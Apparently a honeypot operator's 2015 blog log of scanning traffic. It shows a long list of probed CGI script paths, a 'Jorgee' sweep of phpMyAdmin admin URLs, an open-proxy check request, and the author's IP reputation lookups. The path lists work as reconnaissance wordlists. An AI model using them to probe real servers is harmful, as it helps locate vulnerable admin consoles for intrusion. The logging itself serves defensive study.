GET /cgi-bin/addbanner.cgi HTTP/1.0
GET /cgi-bin/add_ftp.cgi HTTP/1.0
GET /cgi-bin/adduser.cgi HTTP/1.0
GET /cgi-bin/admin/admin.cgi HTTP/1.0
GET /cgi-bin/admin.cgi HTTP/1.0
GET /cgi-bin/adminhot.cgi HTTP/1.0
GET /cgi-bin/admin.html HTTP/1.0
GET /cgi-bin/admin.pl HTTP/1.0
GET /cgi-bin/admin/setup.cgi HTTP/1.0
GET /cgi-bin/adminwww.cgi HTTP/1.0
GET /cgi-bin/af.cgi HTTP/1.0
GET /cgi-bin/aglimpse.cgi HTTP/1.0
GET /cgi-bin/alienform.cgi HTTP/1.0
GET /cgi-bin/AnyBoard.cgi HTTP/1.0
GET /cgi-bin/architext_query.cgi HTTP/1.0
GET /cgi-bin/astrocam.cgi HTTP/1.0
GET /cgi-bin/AT-admin.cgi HTTP/1.0
GET /cgi-bin/AT-generate.cgi HTTP/1.0
GET /cgi-bin/auction/auction.cgi HTTP/1.0
GET /cgi-bin/auktion.cgi HTTP/1.0
GET /cgi-bin/authLogin.cgi HTTP/1.0
GET /cgi-bin/ax-admin.cgi HTTP/1.0
GET /cgi-bin/ax.cgi HTTP/1.0
GET /cgi-bin/axs.cgi HTTP/1.0
GET /cgi-bin/badmin.cgi HTTP/1.0
GET /cgi-bin/banner.cgi HTTP/1.0
GET /cgi-bin/bannereditor.cgi HTTP/1.0
GET /cgi-bin/bash HTTP/1.0
GET /cgi-bin/bb-ack.sh HTTP/1.0
GET /cgi-bin/bb-histlog.sh HTTP/1.0
GET /cgi-bin/bb-hist.sh HTTP/1.0
GET /cgi-bin/bb-hostsvc.sh HTTP/1.0
GET /cgi-bin/bb-replog.sh HTTP/1.0
GET /cgi-bin/bb-rep.sh HTTP/1.0
GET /cgi-bin/BBS/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bbs_forum.cgi HTTP/1.0
GET /cgi-bin/bigconf.cgi HTTP/1.0
GET /cgi-bin/bizdb1-search.cgi HTTP/1.0
GET /cgi-bin/blog/mt-check.cgi HTTP/1.0
GET /cgi-bin/blog/mt-load.cgi HTTP/1.0
GET /cgi-bin/bnbform.cgi HTTP/1.0
GET /cgi-bin/book.cgi HTTP/1.0
GET /cgi-bin/boozt/admin/index.cgi HTTP/1.0
GET /cgi-bin/bsguest.cgi HTTP/1.0
GET /cgi-bin/bslist.cgi HTTP/1.0
GET /cgi-bin/build.cgi HTTP/1.0
GET /cgi-bin/bulk/bulk.cgi HTTP/1.0
GET /cgi-bin/cached_feed.cgi HTTP/1.0
GET /cgi-bin/cachemgr.cgi HTTP/1.0
GET /cgi-bin/calendar/index.cgi HTTP/1.0
GET /cgi-bin/cartmanager.cgi HTTP/1.0
GET /cgi-bin/cbmc/forums.cgi HTTP/1.0
GET /cgi-bin/ccvsblame.cgi HTTP/1.0
GET /cgi-bin/c_download.cgi HTTP/1.0
GET /cgi-bin/cgforum.cgi HTTP/1.0
GET /cgi-bin/cgi.cgi HTTP/1.0
GET /cgi-bin/cgi_process HTTP/1.0
GET /cgi-bin/classified.cgi HTTP/1.0
GET /cgi-bin/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/classifieds.cgi HTTP/1.0
GET /cgi-bin/classifieds/index.cgi HTTP/1.0
GET /cgi-bin/.cobalt/alert/service.cgi HTTP/1.0
GET /cgi-bin/.cobalt/message/message.cgi HTTP/1.0
GET /cgi-bin/.cobalt/siteUserMod/siteUserMod.cgi HTTP/1.0
GET /cgi-bin/commandit.cgi HTTP/1.0
GET /cgi-bin/commerce.cgi HTTP/1.0
GET /cgi-bin/common/listrec.pl HTTP/1.0
GET /cgi-bin/compatible.cgi HTTP/1.0
GET /cgi-bin/contact.cgi HTTP/1.0
GET /cgi-bin/Count.cgi HTTP/1.0
GET /cgi-bin/csChatRBox.cgi HTTP/1.0
GET /cgi-bin/csGuestBook.cgi HTTP/1.0
GET /cgi-bin/csLiveSupport.cgi HTTP/1.0
GET /cgi-bin/CSMailto.cgi HTTP/1.0
GET /cgi-bin/CSMailto/CSMailto.cgi HTTP/1.0
GET /cgi-bin/csNews.cgi HTTP/1.0
GET /cgi-bin/csNewsPro.cgi HTTP/1.0
GET /cgi-bin/csPassword.cgi HTTP/1.0
GET /cgi-bin/csPassword/csPassword.cgi HTTP/1.0
GET /cgi-bin/csSearch.cgi HTTP/1.0
GET /cgi-bin/csv_db.cgi HTTP/1.0
GET /cgi-bin/cvsblame.cgi HTTP/1.0
GET /cgi-bin/cvslog.cgi HTTP/1.0
GET /cgi-bin/cvsquery.cgi HTTP/1.0
GET /cgi-bin/cvsqueryform.cgi HTTP/1.0
GET /cgi-bin/day5datacopier.cgi HTTP/1.0
GET /cgi-bin/day5datanotifier.cgi HTTP/1.0
GET /cgi-bin/db_manager.cgi HTTP/1.0
GET /cgi-bin/dbman/db.cgi HTTP/1.0
GET /cgi-bin/dcforum.cgi HTTP/1.0
GET /cgi-bin/defaultwebpage.cgi HTTP/1.0
GET /cgi-bin/dfire.cgi HTTP/1.0
GET /cgi-bin/diagnose.cgi HTTP/1.0
GET /cgi-bin/dig.cgi HTTP/1.0
GET /cgi-bin/directorypro.cgi HTTP/1.0
GET /cgi-bin/download.cgi HTTP/1.0
GET /cgi-bin/emu/html/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail.cgi HTTP/1.0
GET /cgi-bin/emumail/emumail.cgi HTTP/1.0
GET /cgi-bin/enter.cgi HTTP/1.0
GET /cgi-bin/env.cgi HTTP/1.0
GET /cgi-bin/environ.cgi HTTP/1.0
GET /cgi-bin/ezadmin.cgi HTTP/1.0
GET /cgi-bin/ezboard.cgi HTTP/1.0
GET /cgi-bin/ezman.cgi HTTP/1.0
GET /cgi-bin/ezshopper2/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper3/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/loadpage.cgi HTTP/1.0
GET /cgi-bin/ezshopper/search.cgi HTTP/1.0
GET /cgi-bin/faqmanager.cgi HTTP/1.0
GET /cgi-bin/FileSeek2.cgi HTTP/1.0
GET /cgi-bin/FileSeek.cgi HTTP/1.0
GET /cgi-bin/finger.cgi HTTP/1.0
GET /cgi-bin/firmwarecfg HTTP/1.0
GET /cgi-bin/flexform.cgi HTTP/1.0
GET /cgi-bin/fom.cgi HTTP/1.0
GET /cgi-bin/fom/fom.cgi HTTP/1.0
GET /cgi-bin/FormHandler.cgi HTTP/1.0
GET /cgi-bin/FormMail.cgi HTTP/1.0
GET /cgi-bin/forum.cgi HTTP/1.0
GET /cgi-bin/gbadmin.cgi HTTP/1.0
GET /cgi-bin/gbook/gbook.cgi HTTP/1.0
GET /cgi-bin/generate.cgi HTTP/1.0
GET /cgi-bin/getdoc.cgi HTTP/1.0
GET /cgi-bin/gH.cgi HTTP/1.0
GET /cgi-bin/gm-authors.cgi HTTP/1.0
GET /cgi-bin/gm.cgi HTTP/1.0
GET /cgi-bin/gm-cplog.cgi HTTP/1.0
GET /cgi-bin/guestbook.cgi HTTP/1.0
GET /cgi-bin/handler HTTP/1.0
GET /cgi-bin/handler.cgi HTTP/1.0
GET /cgi-bin/handler/netsonar HTTP/1.0
GET /cgi-bin/hello HTTP/1.0
GET /cgi-bin/hello.cgi HTTP/1.0
GET /cgi-bin/helpme HTTP/1.0
GET /cgi-bin/hitview.cgi HTTP/1.0
GET /cgi-bin/hsx.cgi HTTP/1.0
GET /cgi-bin/html2chtml.cgi HTTP/1.0
GET /cgi-bin/html2wml.cgi HTTP/1.0
GET /cgi-bin/htsearch.cgi HTTP/1.0
GET /cgi-bin/icat HTTP/1.0
GET /cgi-bin/ICuGI/EST/blast_detail.cgi HTTP/1.0
GET /cgi-bin/if/admin/nph-build.cgi HTTP/1.0
GET /cgi-bin/ikonboard/help.cgi HTTP/1.0
GET /cgi-bin/ImageFolio/admin/admin.cgi HTTP/1.0
GET /cgi-bin/imageFolio.cgi HTTP/1.0
GET /cgi-bin/index.cgi HTTP/1.0
GET /cgi-bin/info.sh HTTP/1.0
GET /cgi-bin/infosrch.cgi HTTP/1.0
GET /cgi-bin/jammail.pl HTTP/1.0
GET /cgi-bin/journal.cgi HTTP/1.0
GET /cgi-bin/lastlines.cgi HTTP/1.0
GET /cgi-bin/loadpage.cgi HTTP/1.0
GET /cgi-bin/login.cgi HTTP/1.0
GET /cgi-bin/logit.cgi HTTP/1.0
GET /cgi-bin/log-reader.cgi HTTP/1.0
GET /cgi-bin/lookwho.cgi HTTP/1.0
GET /cgi-bin/lwgate.cgi HTTP/1.0
GET /cgi-bin/MachineInfo HTTP/1.0
GET /cgi-bin/magiccard.cgi HTTP/1.0
GET /cgi-bin/mail/emumail.cgi HTTP/1.0
GET /cgi-bin/maillist.cgi HTTP/1.0
GET /cgi-bin/mailnews.cgi HTTP/1.0
GET /cgi-bin/mail/nph-mr.cgi HTTP/1.0
GET /cgi-bin/main.cgi HTTP/1.0
GET /cgi-bin/main_menu.pl HTTP/1.0
GET /cgi-bin/man.sh HTTP/1.0
GET /cgi-bin/meme.cgi HTTP/1.0
GET /cgi-bin/mini_logger.cgi HTTP/1.0
GET /cgi-bin/mmstdod.cgi HTTP/1.0
GET /cgi-bin/moin.cgi HTTP/1.0
GET /cgi-bin/mojo/mojo.cgi HTTP/1.0
GET /cgi-bin/mrtg.cgi HTTP/1.0
GET /cgi-bin/mt/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt/mt-load.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-check.cgi HTTP/1.0
GET /cgi-bin/mt-static/mt-load.cgi HTTP/1.0
GET /cgi-bin/musicqueue.cgi HTTP/1.0
GET /cgi-bin/myguestbook.cgi HTTP/1.0
GET /cgi-bin/.namazu.cgi HTTP/1.0
GET /cgi-bin/netauth.cgi HTTP/1.0
GET /cgi-bin/netpad.cgi HTTP/1.0
GET /cgi-bin/newsdesk.cgi HTTP/1.0
GET /cgi-bin/nlog-smb.cgi HTTP/1.0
GET /cgi-bin/nph-emumail.cgi HTTP/1.0
GET /cgi-bin/nph-exploitscanget.cgi HTTP/1.0
GET /cgi-bin/nph-publish.cgi HTTP/1.0
GET /cgi-bin/nph-test.cgi HTTP/1.0
GET /cgi-bin/pagelog.cgi HTTP/1.0
GET /cgi-bin/pbcgi.cgi HTTP/1.0
GET /cgi-bin/perlshop.cgi HTTP/1.0
GET /cgi-bin/pfdispaly.cgi HTTP/1.0
GET /cgi-bin/pfdisplay.cgi HTTP/1.0
GET /cgi-bin/phf.cgi HTTP/1.0
GET /cgi-bin/photo/manage.cgi HTTP/1.0
GET /cgi-bin/photo/protected/manage.cgi HTTP/1.0
GET /cgi-bin/php HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php4 HTTP/1.0
GET /cgi-bin/php4.cgi HTTP/1.0
GET /cgi-bin/php5.cgi HTTP/1.0
GET /cgi-bin/php5 HTTP/1.0
GET /cgi-bin/php5? HTTP/1.0
GET /cgi-bin/php5-cgi HTTP/1.0
GET /cgi-bin/php5-cli? HTTP/1.0
GET /cgi-bin/php-cgi HTTP/1.0
GET /cgi-bin/php.cgi HTTP/1.0
GET /cgi-bin/php-cgi.bin HTTP/1.0
GET /cgi-bin/pollit/Poll_It_SSI_v2.0.cgi HTTP/1.0
GET /cgi-bin/pollssi.cgi HTTP/1.0
GET /cgi-bin/postcards.cgi HTTP/1.0
GET /cgi-bin/powerup/r.cgi HTTP/1.0
GET /cgi-bin/printenv HTTP/1.0
GET /cgi-bin/probecontrol.cgi HTTP/1.0
GET /cgi-bin/profile.cgi HTTP/1.0
GET /cgi-bin/publisher/search.cgi HTTP/1.0
GET /cgi-bin/quickstore.cgi HTTP/1.0
GET /cgi-bin/quizme.cgi HTTP/1.0
GET /cgi-bin/ratlog.cgi HTTP/1.0
GET /cgi-bin/r.cgi HTTP/1.0
GET /cgi-bin/recent.cgi HTTP/1.0
GET /cgi-bin/register.cgi HTTP/1.0
GET /cgi-bin/replicator/webpage.cgi/ HTTP/1.0
GET /cgi-bin/responder.cgi HTTP/1.0
GET /cgi-bin/robadmin.cgi HTTP/1.0
GET /cgi-bin/robpoll.cgi HTTP/1.0
GET /cgi-bin/sat-ir-web.pl HTTP/1.0
GET /cgi-bin/sbcgi/sitebuilder.cgi HTTP/1.0
GET /cgi-bin/scoadminreg.cgi HTTP/1.0
GET /cgi-bin-sdb/printenv HTTP/1.0
GET /cgi-bin/search HTTP/1.0
GET /cgi-bin/search.cgi HTTP/1.0
GET /cgi-bin/search/search.cgi HTTP/1.0
GET /cgi-bin/sendform.cgi HTTP/1.0
GET /cgi-bin/shop.cgi HTTP/1.0
GET /cgi-bin/shopper.cgi HTTP/1.0
GET /cgi-bin/shopplus.cgi HTTP/1.0
GET /cgi-bin/showcheckins.cgi HTTP/1.0
GET /cgi-bin/signon.cgi HTTP/1.0
GET /cgi-bin/simplestguest.cgi HTTP/1.0
GET /cgi-bin/simplestmail.cgi HTTP/1.0
GET /cgi-bin/smartsearch.cgi HTTP/1.0
GET /cgi-bin/smartsearch/smartsearch.cgi HTTP/1.0
GET /cgi-bin/snorkerz.bat HTTP/1.0
GET /cgi-bin/snorkerz.cmd HTTP/1.0
GET /cgi-bin/sojourn.cgi HTTP/1.0
GET /cgi-bin/spin_client.cgi HTTP/1.0
GET /cgi-bin/start.cgi HTTP/1.0
GET /cgi-bin/status HTTP/1.0
GET /cgi-bin/status/status.cgi HTTP/1.0
GET /cgi-bin/store/agora.cgi HTTP/1.0
GET /cgi-bin/store.cgi HTTP/1.0
GET /cgi-bin/store/index.cgi HTTP/1.0
GET /cgi-bin/survey.cgi HTTP/1.0
GET /cgi-bin/talkback.cgi HTTP/1.0
GET /cgi-bin/technote/main.cgi HTTP/1.0
GET /cgi-bin/test2.pl HTTP/1.0
GET /cgi-bin/test-cgi HTTP/1.0
GET /cgi-bin/test.cgi HTTP/1.0
GET /cgi-bin/test-cgi.pl HTTP/1.0
GET /cgi-bin/testing_whatever HTTP/1.0
GET /cgi-bin/test.sh HTTP/1.0
GET /cgi-bin/test/test.cgi HTTP/1.0
GET /cgi-bin/tidfinder.cgi HTTP/1.0
GET /cgi-bin/tigvote.cgi HTTP/1.0
GET /cgi-bin/title.cgi HTTP/1.0
GET /cgi-bin/tools/tools.pl HTTP/1.0
GET /cgi-bin/traffic.cgi HTTP/1.0
GET /cgi-bin/tree.php HTTP/1.0
GET /cgi-bin/troops.cgi HTTP/1.0
GET /cgi-bin/ttawebtop.cgi/ HTTP/1.0
GET /cgi-bin/ultraboard.cgi HTTP/1.0
GET /cgi-bin/upload.cgi HTTP/1.0
GET /cgi-bin/urlcount.cgi HTTP/1.0
GET /cgi-bin/viewcvs.cgi HTTP/1.0
GET /cgi-bin/viralator.cgi HTTP/1.0
GET /cgi-bin/virgil.cgi HTTP/1.0
GET /cgi-bin/vote.cgi HTTP/1.0
GET /cgi-bin/vpasswd.cgi HTTP/1.0
GET /cgi-bin/w3mman2html.cgi HTTP/1.0
GET /cgi-bin/way-board.cgi HTTP/1.0
GET /cgi-bin/way-board/way-board.cgi HTTP/1.0
GET /cgi-bin/webbbs.cgi HTTP/1.0
GET /cgi-bin/webcart/webcart.cgi HTTP/1.0
GET /cgi-bin/webdist.cgi HTTP/1.0
GET /cgi-bin/webif.cgi HTTP/1.0
GET /cgi-bin/webmail/html/emumail.cgi HTTP/1.0
GET /cgi-bin/webmap.cgi HTTP/1.0
GET /cgi-bin/webspirs.cgi HTTP/1.0
GET /cgi-bin/whois.cgi HTTP/1.0
GET /cgi-bin/whois_raw.cgi HTTP/1.0
GET /cgi-bin/whois/whois.cgi HTTP/1.0
GET /cgi-bin/wrap HTTP/1.0
GET /cgi-bin/wrap.cgi HTTP/1.0
GET /cgi-bin/wwwboard.cgi.cgi HTTP/1.0
GET /cgi-bin/YaBB/YaBB.cgi HTTP/1.0
GET /cgi-bin/zml.cgi HTTP/1.0
GET /cgi-mod/index.cgi HTTP/1.0
GET /cgistart HTTP/1.0
GET /cgis/wwwboard/wwwboard.cgi HTTP/1.0
GET /cgi-sys/addalink.cgi HTTP/1.0
GET /cgi-sys/defaultwebpage.cgi HTTP/1.0
GET /cgi-sys/domainredirect.cgi HTTP/1.0
GET /cgi-sys/entropybanner.cgi HTTP/1.0
GET /cgi-sys/entropysearch.cgi HTTP/1.0
GET /cgi-sys/FormMail-clone.cgi HTTP/1.0
GET /cgi-sys/guestbook.cgi HTTP/1.0
GET /cgi-sys/helpdesk.cgi HTTP/1.0
GET /cgi-sys/mchat.cgi HTTP/1.0
GET /cgi-sys/php5? HTTP/1.0
GET /cgi-sys/randhtml.cgi HTTP/1.0
GET /cgi-sys/realhelpdesk.cgi HTTP/1.0
GET /cgi-sys/realsignup.cgi HTTP/1.0
GET /cgi-sys/signup.cgi HTTP/1.0
GET /cgi-sys/suspendedpage.cgi HTTP/1.0
GET /connector.cgi HTTP/1.0
GET /cp/rac/nsManager.cgi HTTP/1.0
GET /create_release.sh HTTP/1.0
GET /CSNews.cgi HTTP/1.0
GET /csPassword.cgi HTTP/1.0
GET /dana-na/auth/url_default/welcome.cgi HTTP/1.0
GET /dcadmin.cgi HTTP/1.0
GET /dcboard.cgi HTTP/1.0
GET /dcforum.cgi HTTP/1.0
GET /dcforum/dcforum.cgi HTTP/1.0
GET /debug.cgi HTTP/1.0
GET /details.cgi HTTP/1.0
GET /download.cgi HTTP/1.0
GET /edittag/edittag.cgi HTTP/1.0
GET /emumail.cgi HTTP/1.0
GET /enter_bug.cgi HTTP/1.0
GET /ez2000/ezadmin.cgi HTTP/1.0
GET /ez2000/ezboard.cgi HTTP/1.0
GET /ez2000/ezman.cgi HTTP/1.0
GET /fcgi-bin/echo HTTP/1.0
GET /fcgi-bin/echo2 HTTP/1.0
GET /gitweb/ HTTP/1.0
GET /gitweb.cgi HTTP/1.0
GET /gitweb/gitweb.cgi HTTP/1.0
GET /Gozila.cgi HTTP/1.0
GET /hitmatic/analyse.cgi HTTP/1.0
GET /hndUnblock.cgi HTTP/1.0
GET /html/cgi-bin/cgicso HTTP/1.0
GET /index.cgi HTTP/1.0
GET /info.cgi HTTP/1.0
GET /infosrch.cgi HTTP/1.0
GET /left.cgi HTTP/1.0
GET /login.cgi HTTP/1.0
GET /mailview.cgi HTTP/1.0
GET /main.cgi HTTP/1.0
GET /megabook/admin.cgi HTTP/1.0
GET /ministats/admin.cgi HTTP/1.0
GET /mods/apage/apage.cgi HTTP/1.0
GET /_mt/mt.cgi HTTP/1.0
GET /musicqueue.cgi HTTP/1.0
GET /ncbook.cgi HTTP/1.0
GET /newpro.cgi HTTP/1.0
GET /newsletter.sh HTTP/1.0
GET /oem_webstage/cgi-bin/oemapp_cgi HTTP/1.0
GET /page.cgi HTTP/1.0
GET /parse_xml.cgi HTTP/1.0
GET /photodata/manage.cgi HTTP/1.0
GET /photo/manage.cgi HTTP/1.0
GET /phppath/cgi_wrapper HTTP/1.0
GET /phppath/cgi_wrapper? HTTP/1.0
GET /phppath/php HTTP/1.0
GET /phppath/php? HTTP/1.0
GET /print.cgi HTTP/1.0
GET /process_bug.cgi HTTP/1.0
GET /pub/english.cgi HTTP/1.0
GET /quikmail/nph-emumail.cgi HTTP/1.0
GET /quikstore.cgi HTTP/1.0
GET /redirects/redir.cgi HTTP/1.0
GET /reviews/newpro.cgi HTTP/1.0
GET /ROADS/cgi-bin/search.pl HTTP/1.0
GET /sample01.cgi HTTP/1.0
GET /sample02.cgi HTTP/1.0
GET /sample03.cgi HTTP/1.0
GET /sample04.cgi HTTP/1.0
GET /sampleposteddata.cgi HTTP/1.0
GET /scancfg.cgi HTTP/1.0
GET /servers/link.cgi HTTP/1.0
GET /setpasswd.cgi HTTP/1.0
GET /SetSecurity.shm HTTP/1.0
GET /shop/member_html.cgi HTTP/1.0
GET /shop/normal_html.cgi HTTP/1.0
GET /site_searcher.cgi HTTP/1.0
GET /siteUserMod.cgi HTTP/1.0
GET /submit.cgi HTTP/1.0
GET /sys-cgi HTTP/1.0
GET /technote/print.cgi HTTP/1.0
GET /template.cgi HTTP/1.0
GET /test.cgi HTTP/1.0
GET /tmUnblock.cgi HTTP/1.0
GET /upload.cgi HTTP/1.0
GET /userreg.cgi HTTP/1.0
GET /users/scripts/submit.cgi HTTP/1.0
GET /Web_Store/web_store.cgi HTTP/1.0
GET /webtools/bonsai/ccvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvsblame.cgi HTTP/1.0
GET /webtools/bonsai/cvslog.cgi HTTP/1.0
GET /webtools/bonsai/cvsquery.cgi HTTP/1.0
GET /webtools/bonsai/cvsqueryform.cgi HTTP/1.0
GET /webtools/bonsai/showcheckins.cgi HTTP/1.0
GET /wwwadmin.cgi HTTP/1.0
GET /wwwboard.cgi HTTP/1.0
GET /wwwboard/wwwboard.cgi HTTP/1.0
GET /xul/ HTTP/1.0

Mittwoch, 9. September 2015

Checking Database config - 202.137.205.134

BEGIN OF HTTP DATA:
2015-09-09 01:48:57
Source IP: 202.137.205.134
Country: AU RiskScore: 1 Malware: []
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
Connection: Keep-Alive
Keep-Alive: 300
User-Agent: Mozilla/5.0 Jorgee
Host: 195.169.125.87
The IP made several tries to access database related access console.
So, time to show the new tool :-)
 python.exe .\spider.py -i 202.137.205.134
<?xml version="1.0" encoding="UTF-8"?>
<ip>202.137.205.134
<reporter>SANS Internet Storm Cast</reporter>
<comment>IP is listed on SANS ISC</comment>
<reference>https://isc.sans.edu/api/ip/202.137.205.134</reference>
</reporter>
</ip>
HEAD http://195.169.125.87:80/1phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/2phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/3phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/4phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/MyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2011/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2012/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2013/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2014/ HTTP/1.1
HEAD http://195.169.125.87:80/PMA2015/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/db/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/sysadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/admin/web/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/PMA/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/db/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/administrator/web/ HTTP/1.1
HEAD http://195.169.125.87:80/database/ HTTP/1.1
HEAD http://195.169.125.87:80/db/ HTTP/1.1
HEAD http://195.169.125.87:80/db/db-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/dbweb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/db/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/db/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/myadminphp/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/admin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/db/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/dbadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pMA/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/sqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/mysql/web/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/mysqlmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/php-my-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin-4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phpMyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmy/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin1/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/phppma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2011/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2012/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2013/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2014/ HTTP/1.1
HEAD http://195.169.125.87:80/pma2015/ HTTP/1.1
HEAD http://195.169.125.87:80/program/ HTTP/1.1
HEAD http://195.169.125.87:80/shopdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/php-myadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpMyAdmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmanager/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmy-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin2/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin3/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/phpmyadmin4/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql-admin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sql/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqladmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/sqlweb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webadmin/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/webdb/ HTTP/1.1
HEAD http://195.169.125.87:80/sql/websql/ HTTP/1.1
HEAD http://195.169.125.87:80/sqlmanager/ HTTP/1.1

Montag, 31. August 2015

24x7-allrequestsallowed.com - 146.185.239.100

BEGIN OF HTTP DATA:
2015-08-31 21:33:47
Source IP: 146.185.239.100
Country: RU RiskScore: 1 Malware: []
GET http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU HTTP/1.1
Host: 24x7-allrequestsallowed.com
Accept: */*
Proxy-Connection: Keep-Alive
I find these requests from time to time on my server. When executing the statement by hand it leads to:
curl http://24x7-allrequestsallowed.com/?PHPSESSID=mg2adea600143P%5BVJWPHYCF%5DJOU
Thank you for using our service
So it looks like a check to find servers which can connect to outside servers.

Blacklist StatusBLACKLISTED 3/40
IP Address146.185.239.100 ( Websites Lookup )
Reverse DNSUnknown
ASNAS5577
ASN Ownerroot SA
ISPPetersburg Internet Network ltd.
ContinentEurope
Country CodeFlag (RU) Russian Federation


Perl favicon.icon Download attempt - 211.144.37.41


BEGIN OF HTTP DATA:
2015-08-30 15:49:21
Source IP: 211.144.37.41
Country: CN RiskScore: 10 Malware: []
GET /phppath/cgi_wrapper HTTP/1.1
Accept: */*
Accept-Language: en-us
Accept-Encoding: gzip, deflate
